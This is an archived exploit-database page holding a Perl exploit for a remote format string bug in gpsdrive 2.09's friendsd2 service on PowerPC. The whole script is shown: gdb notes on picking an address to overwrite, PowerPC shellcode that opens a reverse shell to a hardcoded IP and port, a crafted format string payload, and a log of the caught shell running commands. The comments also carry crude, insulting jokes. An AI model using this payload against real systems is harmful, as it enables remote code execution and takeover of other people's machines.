[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)
# Published : 2005-11-04
# Author : Kevin Finisterre
# Previous Title : linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit
# Next Title : Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (port bind) 


#!/usr/bin/perl -w
# 
# Heh - Code by KF (kf_lists[at]digital_munition[dot]com)
#     - Shellcode by Charles Stevenson
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. 
# Free 14 day Testicle licking trial available! 
#
#                           IIIIIIIIII
#                           I::::::::I
#                           I::::::::I
#                           II::::::II
#                             I::::I
#                             I::::I ##     ##  #######  ########  ##    ##
#                             I::::I ##     ## ##     ## ##     ##   ####
# EEEEEEEEEEEEEEEEEEEEEE      I::::I ##     ## ##     ## ########     ##
# E::::::::::::::::::::E      I::::I  ##   ##  ##     ## ##   ##      ##
# E::::::::::::::::::::E      I::::I   ## ##   ##     ## ##    ##     ##
# EE::::::EEEEEEEEE::::E      I::::I    ###     #######  ##     ##    ##
#   E:::::E       EEEEEE      I::::I
#   E:::::E                 II::::::II
#   E::::::EEEEEEEEEE       I::::::::I
#   E:::::::::::::::E  and  I::::::::I
#   E:::::::::::::::E       IIIIIIIIII
#   E::::::EEEEEEEEEE    ########   #######  ##    ## ##    ##
#   E:::::E              ##     ## ##     ## ###   ##  ##  ##
#   E:::::E       EEEEEE ##     ## ##     ## ####  ##   ####
# EE::::::EEEEEEEE:::::E ########  ##     ## ## ## ##    ##
# E::::::::::::::::::::E ##     ## ##     ## ##  ####    ##
# E::::::::::::::::::::E ##     ## ##     ## ##   ###    ##
# EEEEEEEEEEEEEEEEEEEEEE ########   #######  ##    ##    ##
# (Kickin you all up in your grill piece since the early 90's)
#                                                      
# friendsd.c:367:   fprintf (stderr, txt);
#
# Tested against: gpsdrive_2.09-2_powerpc.deb
#
# Crash the program and go to frame 2
# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
# (gdb) bt
# #0  0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
# #1  0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6
# #2  0x0f6825d0 in fprintf () from /lib/tls/libc.so.6
# #3  0x100024b8 in dg_echo ()
# #4  0x10002f28 in main ()
#
# Grab the address of Arglist for frame 2 and overwrite that +4
# (gdb) i f
# Stack level 2, frame at 0x7fffad70:
# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8
# called by frame at 0x7fffae00, caller of frame at 0x7fff8700
# Arglist at 0x7fffad70, args:
# Locals at 0x7fffad70, Previous frame's sp in r1
#
# (gdb) x/a 0x7fffad70+4
# 0x7fffad74:     0xf6825d0 <fprintf+112>  (overwrite this)
#
# animosity:/home/kfinisterre# nc -l -p 31337 -vvv
# listening on [any] 31337 ...
# 192.168.1.1: inverse host lookup failed: Unknown host
# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) 
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
# uname -a;
# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux
#
# This is NOT reliable or robust... Find your own damn pointers to overwrite

use Net::Friends;
use Data::Dumper;

$shellcode  =
"x69x69x69x69"  .  
# /* connect-core5.c by Charles Stevenson <core@bokeoa.com> */
"x7cx3fx0bx78" . #/*mr    r31,r1*/
"x3bx40x01x0e" . #/*li    r26,270*/
"x3bx5axfexf4" . #/*addi  r26,r26,-268*/
"x7fx43xd3x78" . #/*mr    r3,r26*/
"x3bx60x01x0d" . #/*li    r27,269*/
"x3bx7bxfexf4" . #/*addi  r27,r27,-268*/
"x7fx64xdbx78" . #/*mr    r4,r27*/
"x7cxa5x2ax78" . #/*xor   r5,r5,r5*/
"x7cx3cx0bx78" . #/*mr    r28,r1*/
"x3bx9cx01x0c" . #/*addi  r28,r28,268*/
"x90x7cxffx08" . #/*stw   r3,-248(r28)*/
"x90x9cxffx0c" . #/*stw   r4,-244(r28)*/
"x90xbcxffx10" . #/*stw   r5,-240(r28)*/
"x7fx63xdbx78" . #/*mr    r3,r27*/
"x3bxdfx01x0c" . #/*addi  r30,r31,268*/
"x38x9exffx08" . #/*addi  r4,r30,-248*/
"x3bx20x01x98" . #/*li    r25,408*/
"x7fx20x16x70" . #/*srawi r0,r25,2*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"x7cx78x1bx78" . #/*mr    r24,r3*/
"xb3x5exffx16" . #/*sth   r26,-234(r30)*/
"x7fxbdxeax78" . #/*xor   r29,r29,r29*/
#// Craft your exploit to poke these value in. Right now it's set
#// for port 31337 and ip 192.168.1.1. Here's an example
#// core@morpheus:~$ printf "0x%02x%02xn0x%02x%02xn" 192 168 1 1
#// 0xc0a8
#// 0x0101
"x63xbd" .  # /* PORT # */ 
"x7ax69" .  #/*ori   r29,r29,31337*/
"xb3xbexffx18" . #/*sth   r29,-232(r30)*/
"x3fxa0" . # /*IP(A.B) */ 
#"x42x07" . # wtf is this?
"xc0xa8" . # /*lis   r29,-16216*/
"x63xbd" . # /*IP(C.D) */ 
#"xa1x39" . #  wtf is this? 
"x01x01" . # /*ori   r29,r29,257*/
"x93xbexffx1a" . #/*stw   r29,-230(r30)*/
"x93x1cxffx08" . #/*stw   r24,-248(r28)*/
"x3axdexffx16" . #/*addi  r22,r30,-234*/
"x92xdcxffx0c" . #/*stw   r22,-244(r28)*/
"x3bxa0x01x1c" . #/*li    r29,284*/
"x38xbdxfexf4" . #/*addi  r5,r29,-268*/
"x90xbcxffx10" . #/*stw   r5,-240(r28)*/
"x7fx20x16x70" . #/*srawi r0,r25,2*/
"x7cx7axdax14" . #/*add   r3,r26,r27*/
"x38x9cxffx08" . #/*addi  r4,r28,-248*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"x7fx03xc3x78" . #/*mr    r3,r24*/
"x7cx84x22x78" . #/*xor   r4,r4,r4*/
"x3axe0x01xf8" . #/*li    r23,504*/
"x7exe0x1ex70" . #/*srawi r0,r23,3*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"x7fx03xc3x78" . #/*mr    r3,r24*/
"x7fx64xdbx78" . #/*mr    r4,r27*/
"x7exe0x1ex70" . #/*srawi r0,r23,3*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
#// comment out the next 4 lines to save 16 bytes and lose stderr
#//"x7fx03xc3x78"    /*mr    r3,r24*/
#//"x7fx44xd3x78"    /*mr    r4,r26*/
#//"x7exe0x1ex70"    /*srawi r0,r23,3*/
#//"x44xdexadxf2"    /*.long0x44deadf2*/
"x7cxa5x2ax79" . #/*xor.  r5,r5,r5*/
"x42x40xffx35" . #/*bdzl+ 10000454<main>*/
"x7fx08x02xa6" . #/*mflr  r24*/
"x3bx18x01x34" . #/*addi  r24,r24,308*/
"x98xb8xfexfb" . #/*stb   r5,-261(r24)*/	/* KF / Core / Ghandi mojo */
"x38x78xfexf4" . #/*addi  r3,r24,-268*/
"x90x61xffxf8" . #/*stw   r3,-8(r1)*/
"x38x81xffxf8" . #/*addi  r4,r1,-8*/
"x90xa1xffxfc" . #/*stw   r5,-4(r1)*/
"x3bxc0x01x60" . #/*li    r30,352*/
"x7fxc0x2ex70" . #/*srawi r0,r30,5*/
"x44xdexadxf2" . #/*.long0x44deadf2*/
"/bin/shZ";     # /* Z will become NULL */

$name = 'aaaaaaaa-aaaa';  
 
$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb)
$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. 

$addy  = pack('l', $writeaddr);
$addy2 = pack('l', $writeaddr+2);

#$instr = 0x7fffae84;  # Shellcode (inside gdb)
$instr = 0x7fffaea4;  # Shellcode (outside gdb)

$lo = ($instr >> 0) & 0xffff;
$hi = ($instr >> 16) & 0xffff;
		
$hi = $hi - 0x4e;
$lo = (0x10000 + $lo) - $hi - 0x50;		

#$hi = 1; $lo =1;

$dir = "$addy$addy2|%." . $hi . "d|%28$hn|%." . $lo . "d|%29$hn$shellcode";

$friends = Net::Friends->new(shift || 'localhost');
$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir);
print Dumper($friends->query);

# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! 

# www.Syue.com [2005-11-04]